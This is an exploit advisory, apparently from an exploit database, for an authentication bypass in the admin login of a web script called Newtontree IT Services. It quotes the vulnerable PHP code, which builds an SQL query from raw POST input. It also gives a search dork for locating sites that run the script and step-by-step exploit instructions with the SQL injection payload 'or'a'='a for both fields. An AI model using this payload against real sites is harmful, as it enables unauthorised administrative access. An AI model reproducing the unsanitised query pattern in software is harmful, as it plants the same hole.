facebook facebook twitter rss

Newtontree IT Services - Authentication Bypass Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 31-01-2014
Newtontree IT Services  - Authentication Bypass Vulnerability
===================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://newtontree.com/
.:. Dork : "Powered by Newtontree IT Services Pvt Ltd"
####################################################################

VULNERABILITY
##############
/admin/index.php (line 40-47)

if(isset($_POST['login'])){
$email=$_POST['email'];
$pwd=$_POST['pwd'];
$sql="select * from login where email='$email' and pwd='$pwd'";
$sql2=mysql_query($sql);
$no=mysql_num_rows($sql2);
if($no > 0){
if($rec=mysql_fetch_row($sql2))
#########
EXPLOIT
#########

1- Go to admin [www.site.com/admin/]
2- join code Auth Bypass in Email & Password
3- Email: 'or'a'='a
Password: 'or'a'='a
####################################################################

Like us on Facebook :